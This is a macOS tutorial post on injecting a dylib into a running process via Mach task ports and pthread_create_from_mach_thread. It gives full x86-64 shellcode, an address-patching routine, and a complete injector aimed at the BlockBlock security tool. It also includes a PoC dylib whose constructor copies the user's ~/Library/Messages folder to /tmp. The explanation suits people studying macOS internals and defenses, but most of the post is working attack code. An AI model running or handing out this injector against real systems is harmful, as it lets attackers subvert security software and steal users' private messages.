Inject a Dylib

Promote a Mach Thread to a POSIX Thread

Threads are implemented in the Mach kernel, and each thread belongs to a task. Because macOS is also a POSIX-compliant system, threads can be manipulated through the POSIX pthread API as well. Some parts of the system expect to work with pthreads while other parts work with the Mach API, so the thread we create must satisfy both. This duality did not cause issues with the execv system call we used earlier, so we did not have to deal with it; more complex function calls, however, can terminate or fail outright.

In short: macOS supports both the Mach API and the Unix API, and this dual support can sometimes lead to complications.

The previous thread injection relied on access to the remote process's task port and ended by calling thread_create_running to start a thread. Mach threads are not created with a corresponding POSIX thread structure, so any call into the pthread API will fail. To make pthread function calls work, we need to promote the Mach thread to a POSIX thread.

Before macOS 10.14 (Mojave), this could be achieved by calling _pthread_set_self with a NULL pointer.

void
_pthread_set_self(pthread_t p)
{
	return _pthread_set_self_internal(p, true);
}

static inline void
_pthread_set_self_internal(pthread_t p, bool needs_tsd_base_set)
{
	if (p == NULL) {
		p = &_thread;
	}

	uint64_t tid = __thread_selfid();
	if (tid == -1ull) {
		PTHREAD_ABORT("failed to set thread_id");
	}

	p->tsd[_PTHREAD_TSD_SLOT_PTHREAD_SELF] = p;
	p->tsd[_PTHREAD_TSD_SLOT_ERRNO] = &p->err_no;
	p->thread_id = tid;

	if (needs_tsd_base_set) {
		_thread_set_tsd_base(&p->tsd[0]);
	}
}

Since 10.14, the function's code has changed:

void
_pthread_set_self(pthread_t p)
{
#if VARIANT_DYLD
	if (os_likely(!p)) {
		return _pthread_set_self_dyld();
	}
#endif // VARIANT_DYLD
	_pthread_set_self_internal(p);
	_thread_set_tsd_base(&p->tsd[0]);
}

Two helpers stand out here: _pthread_set_self_dyld and _pthread_set_self_internal. The dyld variant is not accessible from user space, while the internal one is.

void
_pthread_set_self_dyld(void)
{
	pthread_t p = main_thread();
	p->thread_id = __thread_selfid();

	if (os_unlikely(p->thread_id == -1ull)) {
		PTHREAD_INTERNAL_CRASH(0, "failed to set thread_id");
	}

	p->tsd[_PTHREAD_TSD_SLOT_PTHREAD_SELF] = p;
	p->tsd[_PTHREAD_TSD_SLOT_ERRNO] = &p->err_no;
	_thread_set_tsd_base(&p->tsd[0]);
}

static inline void
_pthread_set_self_internal(pthread_t p)
{
	os_atomic_store(&p->thread_id, __thread_selfid(), relaxed);

	if (os_unlikely(p->thread_id == -1ull)) {
		PTHREAD_INTERNAL_CRASH(0, "failed to set thread_id");
	}
}

In this version, _pthread_set_self_internal will no longer set up the thread structure since it expects to find a valid thread structure already present. If we pass NULL in place of the thread structure pointer, the function will crash due to a NULL pointer dereference.
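The difference between the two versions can be modelled in a few lines of portable C. This is only a toy sketch: the structure, slot names, and functions below are hypothetical stand-ins, not libpthread's real definitions, and the "new" variant returns NULL where the real code would crash on the dereference.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for the real pthread structure; every name here is hypothetical. */
enum { TOY_SLOT_SELF = 0, TOY_SLOT_ERRNO = 1, TOY_SLOT_COUNT = 2 };

struct toy_pthread {
    void    *tsd[TOY_SLOT_COUNT];
    int      err_no;
    uint64_t thread_id;
};

static struct toy_pthread toy_main_thread;   /* plays the role of _thread */

/* Pre-10.14 shape: NULL falls back to a static structure, then the TSD slots are filled in. */
struct toy_pthread *toy_set_self_old(struct toy_pthread *p, uint64_t tid)
{
    if (p == NULL) {
        p = &toy_main_thread;
    }
    p->tsd[TOY_SLOT_SELF]  = p;
    p->tsd[TOY_SLOT_ERRNO] = &p->err_no;
    p->thread_id = tid;
    return p;
}

/* 10.14+ shape: only thread_id is stored, so p must already be a valid structure.
 * The model returns NULL at the point where the real function would dereference NULL. */
struct toy_pthread *toy_set_self_new(struct toy_pthread *p, uint64_t tid)
{
    if (p == NULL) {
        return NULL;
    }
    p->thread_id = tid;
    return p;
}

/* Walk through both behaviours with a NULL argument. */
void toy_demo(void)
{
    struct toy_pthread *p = toy_set_self_old(NULL, 42);
    assert(p == &toy_main_thread && p->tsd[TOY_SLOT_SELF] == p);
    assert(toy_set_self_new(NULL, 42) == NULL);
}
```

Calling toy_demo() from a test program exercises both paths; the second assertion marks the case that no longer works on 10.14 and later.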

Therefore, we turn to another option: pthread_create_from_mach_thread.

/*
 * A version of pthread_create that is safely callable from an injected mach thread.
 *
 * The _create introspection hook will not fire for threads created from this function.
 *
 * It is not safe to call this function concurrently.
 */
__API_AVAILABLE(macos(10.12), ios(10.0), tvos(10.0), watchos(3.0))
(...)
int pthread_create_from_mach_thread(pthread_t * __restrict,
		const pthread_attr_t * _Nullable __restrict,
		void *(* _Nonnull)(void *), void * _Nullable __restrict);

This function allows a pthread to be created from a Mach thread.

int
pthread_create_from_mach_thread(pthread_t *thread, const pthread_attr_t *attr,
		void *(*start_routine)(void *), void *arg)
{
	unsigned int flags = _PTHREAD_CREATE_FROM_MACH_THREAD;
	return _pthread_create(thread, attr, start_routine, arg, flags);
}

Compared to the original solution, this function does not promote our thread into a valid pthread; it creates a new, valid pthread instead. Our plan is therefore to use the injected Mach thread to create a new, fully configured pthread. We have to pass in an address that will hold the pthread structure and the location of the start routine. The other arguments can be NULL, i.e. pthread_create_from_mach_thread(address of a pthread structure, 0, location of the start routine, 0).
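The call shape is the same as for the ordinary pthread_create, so it can be tried out in a normal process first. The sketch below is an illustration only: it uses pthread_create rather than pthread_create_from_mach_thread so that it builds on any POSIX system, and the function names and the marker value are made up for the example.

```c
#include <assert.h>
#include <pthread.h>
#include <stddef.h>

/* Start routine with the signature both creation functions expect. */
static void *start_routine(void *arg)
{
    (void)arg;
    return (void *)0x1234;   /* arbitrary marker so the caller can tell the routine ran */
}

/* Returns 0 when the thread was created and joined successfully. */
int spawn_with_defaults(void)
{
    pthread_t thread;        /* storage for the new thread's handle (argument 0) */
    void *result = NULL;

    /* attr = NULL and arg = NULL, matching the (address, 0, start routine, 0) shape. */
    int rc = pthread_create(&thread, NULL, start_routine, NULL);
    if (rc != 0) {
        return rc;
    }

    rc = pthread_join(thread, &result);
    if (rc == 0) {
        assert(result == (void *)0x1234);
    }
    return rc;
}
```

Unlike this example, the injected Mach thread does not join the thread it creates, which is why the shellcode that follows ends its bootstrap part with a loop.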

Shellcode

The shellcode should have 2 essential components:

  1. Create a new thread from our Mach thread, calling pthread_create_from_mach_thread.
  2. The new thread calls dlopen to load the dylib of our choice.

Complete shellcode:

;bootstrap Mach thread
_shellcode:
0:  55                      push   rbp                      ; function prologue
1:  48 89 e5                mov    rbp,rsp
4:  48 83 ec 10             sub    rsp,0x10
8:  48 8d 7d f8             lea    rdi,[rbp-8]              ; arg0=rdi=address of (rbp-8)
c:  48 31 f6                xor    rsi,rsi                  ; arg1=rsi=0
f:  48 31 c9                xor    rcx,rcx                  ; arg3=rcx=0
12: 48 8d 15 0e 00 00 00    lea    rdx,[rip+0xe]            ; arg2=rdx= address of (_thread)
19: 48 b8 50 54 48 52 44    movabs rax,0x5452434452485450   ; move address of pthread_create_from_mach_thread into rax (placeholder)
20: 43 52 54
23: ff d0                   call   rax                      ; call pthread_create_from_mach_thread
_jump:
25: eb fe                   jmp    25 <_jump>               ; infinite loop

;the new thread to start dlopen
_thread:
27: 55                      push   rbp                      ; function prologue
28: 48 89 e5                mov    rbp,rsp
2b: 48 83 ec 10             sub    rsp,0x10
2f: 6a 01                   push   0x1           
31: 5e                      pop    rsi                      ; arg1 = rsi = RTLD_LAZY
32: 48 8d 3d 12 00 00 00    lea    rdi,[rip+0x12]           ; arg0 = rdi = address of (_thread+0x24)
39: 48 b8 44 4c 4f 50 45    movabs rax,0x5f5f4e45504f4c44
40: 4e 5f 5f
43: ff d0                   call   rax                      ; call dlopen
45: 48 83 c4 10             add    rsp,0x10                 ; function epilogue   
49: 5d                      pop    rbp
4a: c3                      ret
4b: LIBLIBLIBLIB...                                         ; placeholder for our DYLIB string

In the _shellcode section, we set rdi, the 1st argument, to an address where the new pthread structure will be stored. We set rdx, the 3rd argument, to point to the start routine of the new thread (offset 0x27) via RIP-relative addressing.

The movabs at 0x19 loads a placeholder value into rax, which we will patch later. The infinite loop that follows prevents the thread from exiting.
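The placeholder immediates in the disassembly are simply the ASCII markers read as little-endian 64-bit integers. A small sketch, assuming a little-endian host such as x86-64 (the helper name marker_as_imm64 is made up for this example), makes the correspondence checkable:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Interpret an 8-character marker as the 64-bit immediate that movabs would carry.
 * The result matches the disassembly only on a little-endian host. */
uint64_t marker_as_imm64(const char *marker)
{
    uint64_t imm = 0;
    assert(strlen(marker) == 8);
    memcpy(&imm, marker, sizeof imm);
    return imm;
}
```

On x86-64, marker_as_imm64("PTHRDCRT") yields 0x5452434452485450 and marker_as_imm64("DLOPEN__") yields 0x5f5f4e45504f4c44, the two values shown after movabs in the listing.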

To call dlopen(), we need to pass 2 arguments.

void* dlopen(const char* path, int mode);

The preferred mode is 0x1.

#define RTLD_LAZY	0x1

rip+0x12 points to offset 0x4b, where the placeholder string is located.
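Both RIP-relative displacements in the shellcode follow from the same rule: the displacement is measured from the end of the instruction that uses it. The helper below is a hypothetical checker for that arithmetic, not part of the injector:

```c
#include <assert.h>
#include <stdint.h>

/* Displacement needed for a RIP-relative operand: rip already points past the
 * current instruction, so the base is instr_off + instr_len. */
int32_t rip_rel_disp(uint32_t instr_off, uint32_t instr_len, uint32_t target_off)
{
    assert(instr_len > 0);
    return (int32_t)(target_off - (instr_off + instr_len));
}
```

For the 7-byte lea at 0x12 targeting _thread at 0x27 this gives 0xe, and for the 7-byte lea at 0x32 targeting the string at 0x4b it gives 0x12. The same rule explains the 2-byte jmp at 0x25 to itself: its displacement is -2, encoded as 0xfe.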

We can use the dlsym function, declared in dlfcn.h, to look up the addresses of the functions we need.
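As a minimal sketch of such a lookup, the helper below resolves a symbol by name in the current process. It is an assumption-laden illustration: the name lookup_symbol is made up, and it searches through a handle from dlopen(NULL, RTLD_LAZY) rather than RTLD_DEFAULT so that it compiles without platform-specific feature macros.

```c
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>

/* Resolve a symbol in the running program and the libraries it has loaded.
 * Returns NULL when the symbol cannot be found. */
void *lookup_symbol(const char *name)
{
    assert(name != NULL);

    /* A NULL path asks for a handle to the main program itself. */
    void *self = dlopen(NULL, RTLD_LAZY);
    if (self == NULL) {
        return NULL;
    }

    void *addr = dlsym(self, name);
    dlclose(self);   /* the main program stays loaded, so addr remains valid */
    return addr;
}
```

A call such as lookup_symbol("malloc") returns a non-NULL address in a dynamically linked program, while an unknown name returns NULL.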

The initial shellcode:

char shellcode[] =
"\x55"                            // push       rbp
"\x48\x89\xE5"                    // mov        rbp, rsp
"\x48\x83\xEC\x10"                // sub        rsp, 0x10
"\x48\x8D\x7D\xF8"                // lea        rdi, qword [rbp-8]
"\x48\x31\xc9"                    // xor        rcx,rcx
"\x48\x31\xf6"                    // xor        rsi,rsi
"\x48\x8D\x15\x0E\x00\x00\x00"    // lea        rdx, qword ptr [rip + 0xe]
"\x48\xB8"                        // movabs     rax, pthread_create_from_mach_thread
"PTHRDCRT"
"\xFF\xD0"                        // call       rax
"\xEB\xFE"                        // jmp        -2

"\x55"                            // push       rbp
"\x48\x89\xE5"                    // mov        rbp, rsp
"\x48\x83\xEC\x10"                // sub        rsp, 0x10
"\x6A\x01"                        // push 1
"\x5E"                            // pop rsi
"\x48\x8D\x3D\x12\x00\x00\x00"    // lea        rdi, qword ptr [rip + 0x12]
"\x48\xB8"                        // movabs     rax, dlopen
"DLOPEN__"
"\xFF\xD0"                        // call       rax
"\x48\x83\xC4\x10"                // add        rsp, 0x10
"\x5D"                            // pop        rbp
"\xC3"                            // ret

"LIBLIBLIBLIB"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

However, we need to patch the placeholder values before the injection.

Apart from using dlsym, we can also refer to a function directly to get its address, e.g. after importing the pthread.h header.

        char* lib = "/tmp/bb.dylib";
        uint64_t addr_of_pthread_create = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_create_from_mach_thread");
        uint64_t addr_of_dlopen = (uint64_t)dlopen;
    
        // Walk the shellcode byte by byte; the bound keeps the longest (9-byte) comparison inside the array.
        char *possible_patch_location = (shellcode);
        size_t i = 0;
        for (i = 0; i + 9 <= sizeof(shellcode); i++, possible_patch_location++) {
    
            // Replace the 8-byte marker with the address of pthread_create_from_mach_thread.
            if (memcmp(possible_patch_location, "PTHRDCRT", 8) == 0) {
                printf("pthread_create_from_mach_thread @%llx\n", addr_of_pthread_create);
                memcpy(possible_patch_location, &addr_of_pthread_create, 8);
            }
    
            // Replace the 8-byte marker with the address of dlopen.
            if (memcmp(possible_patch_location, "DLOPEN__", 8) == 0) {
                printf("dlopen @%llx\n", addr_of_dlopen);
                memcpy(possible_patch_location, &addr_of_dlopen, sizeof(uint64_t));
            }
    
            // Overwrite the string placeholder with the dylib path (including its NUL terminator).
            if (memcmp(possible_patch_location, "LIBLIBLIB", 9) == 0) {
                strcpy(possible_patch_location, lib);
            }
        }

pthread_create_from_mach_thread's address was obtained via dlsym function, while dlopen's address was obtained via type casting.
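The same search-and-replace idea can be factored into a small bounds-checked helper. This is a sketch under assumptions, not the author's code: the name patch_marker and its return convention are invented for illustration, and it patches only the first occurrence of a marker.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Overwrite the first occurrence of marker in buf with value_len bytes from value.
 * Returns the patched offset, or -1 if the marker is absent or the value would not fit. */
long patch_marker(unsigned char *buf, size_t buf_len,
                  const char *marker, const void *value, size_t value_len)
{
    size_t marker_len = strlen(marker);
    assert(marker_len > 0);

    /* off + marker_len <= buf_len keeps every comparison inside the buffer. */
    for (size_t off = 0; off + marker_len <= buf_len; off++) {
        if (memcmp(buf + off, marker, marker_len) == 0) {
            if (off + value_len > buf_len) {
                return -1;
            }
            memcpy(buf + off, value, value_len);
            return (long)off;
        }
    }
    return -1;
}
```

Applied to a buffer holding "\x48\xB8" followed by "PTHRDCRT", the helper reports offset 2, which is where the movabs immediate begins.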

Create a PoC dylib:

#include <stdlib.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv) {
    system("cp -r ~/Library/Messages/ /tmp/Messages/");
    exit(0);
}
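The PoC relies on the constructor attribute, a GCC/Clang extension that runs a function when the image is loaded, before main in an executable or during dlopen for a library. A harmless sketch of that ordering, with made-up names, looks like this:

```c
#include <assert.h>

static int constructor_ran = 0;

/* Runs automatically at load time; nothing calls it explicitly. */
__attribute__((constructor))
static void on_load(void)
{
    constructor_ran = 1;
}

/* Reports whether the constructor has already executed. */
int constructor_has_run(void)
{
    return constructor_ran;
}

/* Aborts if called before the constructor had a chance to run. */
void check_constructor_ran(void)
{
    assert(constructor_ran == 1);
}
```

When check_constructor_ran() is called from main, the flag is already set, which shows that the constructor ran without any explicit call.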

Complete code:

 #import <Foundation/Foundation.h>
 #import <AppKit/AppKit.h>
 #include <mach/mach_vm.h>
 #include <sys/sysctl.h>
 #include <dlfcn.h>
 #include <pthread.h> 

 #define STACK_SIZE 0x1000
 #define CODE_SIZE 128
 
char shellcode[] =
"\x55"                            // push       rbp
"\x48\x89\xE5"                    // mov        rbp, rsp
"\x48\x83\xEC\x10"                // sub        rsp, 0x10
"\x48\x8D\x7D\xF8"                // lea        rdi, qword [rbp-8]
"\x48\x31\xc9"                    // xor        rcx,rcx
"\x48\x31\xf6"                    // xor        rsi,rsi
"\x48\x8D\x15\x0E\x00\x00\x00"    // lea        rdx, qword ptr [rip + 0xe]
"\x48\xB8"                        // movabs     rax, pthread_create_from_mach_thread
"PTHRDCRT"
"\xFF\xD0"                        // call       rax
"\xEB\xFE"                        // jmp        -2

"\x55"                            // push       rbp
"\x48\x89\xE5"                    // mov        rbp, rsp
"\x48\x83\xEC\x10"                // sub        rsp, 0x10
"\x6A\x01"                        // push 1
"\x5E"                            // pop rsi
"\x48\x8D\x3D\x12\x00\x00\x00"    // lea        rdi, qword ptr [rip + 0x12]
"\x48\xB8"                        // movabs     rax, dlopen
"DLOPEN__"
"\xFF\xD0"                        // call       rax
"\x48\x83\xC4\x10"                // add        rsp, 0x10
"\x5D"                            // pop        rbp
"\xC3"                            // ret

"LIBLIBLIBLIB"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
 
 uid_t get_uid(pid_t pid)
 {
     uid_t uid = 0;
 
     struct kinfo_proc process;
     size_t buffer_size = sizeof(process);
     
     // Compose search path for sysctl. Here you can specify PID directly.
     const u_int mib_len = 4;
     int mib[mib_len] = {CTL_KERN, KERN_PROC, KERN_PROC_PID, pid};
     int sysctl_result = sysctl(mib, mib_len, &process, &buffer_size, NULL, 0);
 
     // If sysctl did not fail and process with PID available - take UID.
     if ((sysctl_result == 0) && (buffer_size != 0)) {
         uid = process.kp_eproc.e_ucred.cr_uid;
     }
     return uid;
 }
 
 pid_t get_pid(NSString* bundle_id) {
     
     pid_t pid = 0;
     uid_t uid = -1;
     //find applications with bundle ID
     NSArray *runningApplications = [NSRunningApplication runningApplicationsWithBundleIdentifier:bundle_id];
     //check if any found at all
     if (runningApplications.count > 0) {
         for (id app in runningApplications) {
             pid = [app processIdentifier];
             uid = get_uid(pid);
             if (uid != 0) {
                 //if not root (=0) return
                 return pid;
             }
         }
     }
     //if we got here, it means that we didn't find an instance
     printf("[-] There is no instance of the application running as user, exiting...\n");
     exit(-1);
 }
 
 int main(int argc, const char * argv[]) {
         
         pid_t pid = get_pid(@"com.objectiveSee.BlockBlock");
 
         task_t remoteTask;
         kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask);
               
         if (kr != KERN_SUCCESS) {
               printf("[-] Failed to get task port for pid:%d, error: %s\n", pid, mach_error_string(kr));
               return(-1);
             }
         else {
             printf("[+] Got access to the task port of process: %d\n", pid);
         }
         
         mach_vm_address_t remoteStack64 = (vm_address_t) NULL;
         mach_vm_address_t remoteCode64 = (vm_address_t) NULL;
 
         kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE);
 
         if (kr != KERN_SUCCESS) {
             printf("[-] Failed to allocate stack memory in remote thread, error: %s\n", mach_error_string(kr));
             exit(-1);
         } else {
             printf("[+] Allocated remote stack: 0x%llx\n", remoteStack64);
         }
 
         kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE );
 
         if (kr != KERN_SUCCESS) {
             printf("[-] Failed to allocate code memory in remote thread, error: %s\n", mach_error_string(kr));
             exit(-1);
         } else {
             printf("[+] Allocated remote code placeholder: 0x%llx\n", remoteCode64);
         }

        char* lib = "/tmp/bb.dylib";
        uint64_t addr_of_pthread_create = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_create_from_mach_thread");
        uint64_t addr_of_dlopen = (uint64_t)dlopen;
    
        // Walk the shellcode byte by byte; the bound keeps the longest (9-byte) comparison inside the array.
        char *possible_patch_location = (shellcode);
        size_t i = 0;
        for (i = 0; i + 9 <= sizeof(shellcode); i++, possible_patch_location++) {
    
            // Replace the 8-byte marker with the address of pthread_create_from_mach_thread.
            if (memcmp(possible_patch_location, "PTHRDCRT", 8) == 0) {
                printf("pthread_create_from_mach_thread @%llx\n", addr_of_pthread_create);
                memcpy(possible_patch_location, &addr_of_pthread_create, 8);
            }
    
            // Replace the 8-byte marker with the address of dlopen.
            if (memcmp(possible_patch_location, "DLOPEN__", 8) == 0) {
                printf("dlopen @%llx\n", addr_of_dlopen);
                memcpy(possible_patch_location, &addr_of_dlopen, sizeof(uint64_t));
            }
    
            // Overwrite the string placeholder with the dylib path (including its NUL terminator).
            if (memcmp(possible_patch_location, "LIBLIBLIB", 9) == 0) {
                strcpy(possible_patch_location, lib);
            }
        }
         
         kr = mach_vm_write(remoteTask, remoteCode64, (vm_address_t) shellcode, CODE_SIZE);
 
         if (kr != KERN_SUCCESS) {
             printf("[-] Failed to write into remote thread memory, error: %s\n", mach_error_string(kr));
             exit(-1);
         }
         
         kr  = vm_protect(remoteTask, remoteCode64, CODE_SIZE, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
 
         if (kr != KERN_SUCCESS) {
             printf("[!] Failed to give injected code memory proper permissions, error: %s\n", mach_error_string(kr));
             exit(-1);
         }
 
         kr  = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE);
 
         if (kr != KERN_SUCCESS) {
             printf("[!] Failed to give stack memory proper permissions, error: %s\n", mach_error_string(kr));
             exit(-1);
         }
 
         x86_thread_state64_t remoteThreadState64;
 
         memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) );
 
         //shift stack
         remoteStack64 += (STACK_SIZE / 2); // this is the real stack
 
         // set remote instruction pointer
         remoteThreadState64.__rip = (u_int64_t) remoteCode64;
 
         // set remote Stack Pointer
         remoteThreadState64.__rsp = (u_int64_t) remoteStack64;
         remoteThreadState64.__rbp = (u_int64_t) remoteStack64;
 
         printf ("[+] Remote Stack 64  0x%llx, Remote code is 0x%llx\n", remoteStack64, remoteCode64 );
     
         //thread variable
         thread_act_t remoteThread;
 
         //create thread
         kr = thread_create_running( remoteTask, x86_THREAD_STATE64,
            (thread_state_t) &remoteThreadState64, x86_THREAD_STATE64_COUNT, &remoteThread);
 
         if (kr != KERN_SUCCESS) {
             printf("[-] Exploit failed: error: %s\n", mach_error_string (kr));
             return (-1);
         }
         
         printf("[+] Exploit succeeded! Check /tmp/\n");

         return (0);

 }
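One detail of the listing is worth checking by hand: only CODE_SIZE (128) bytes are copied into the target, while the path string starts at offset 0x4b, so the dylib path has to fit in what remains. The helpers below are a hypothetical sanity check for that arithmetic and are not part of the original code.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define CODE_SIZE   128    /* same value as in the listing */
#define PATH_OFFSET 0x4b   /* offset of the LIBLIB... placeholder in the shellcode */

/* Bytes that must reach the target: the instructions, the path, and its NUL terminator. */
size_t payload_size(const char *dylib_path)
{
    assert(dylib_path != NULL);
    return PATH_OFFSET + strlen(dylib_path) + 1;
}

/* Nonzero when the patched payload fits in the CODE_SIZE bytes that are copied. */
int payload_fits(const char *dylib_path)
{
    return payload_size(dylib_path) <= CODE_SIZE;
}
```

For "/tmp/bb.dylib" the payload is 89 bytes, so it fits; a path longer than 52 characters would be cut off by the 128-byte copy unless CODE_SIZE is raised.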

Compile the dylib and the injector:

[Screenshot: image.png]

The exploit works.

[Screenshot: image.png]

My question: is it possible to use a db 'String', 0 directive in place of the patch?
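One way to explore this question, at least for the path string, is to compare the bytes produced by run-time patching with the bytes produced by writing the string into the payload directly, which is what a db '/tmp/bb.dylib', 0 directive would emit. The sketch below uses made-up names and only the last instruction byte plus the string area; it says nothing about the two function addresses, which are only known at run time and would still need patching.

```c
#include <assert.h>
#include <string.h>

/* Tail of the payload with a placeholder that is patched at run time. */
static char tail_patched[] = "\xC3" "LIBLIBLIBLIB" "\0\0\0\0";

/* Same tail with the path written straight into the literal, NUL terminator included. */
static const char tail_embedded[] = "\xC3" "/tmp/bb.dylib";

/* Returns 1 when patching the placeholder yields the same bytes as embedding the string. */
int tails_match(void)
{
    assert(sizeof tail_patched >= sizeof tail_embedded);
    strcpy(tail_patched + 1, "/tmp/bb.dylib");
    return memcmp(tail_patched, tail_embedded, sizeof tail_embedded) == 0;
}
```

Under these assumptions tails_match() returns 1, which suggests that a path fixed at build time could be emitted directly, while a path chosen at run time still calls for the patching loop.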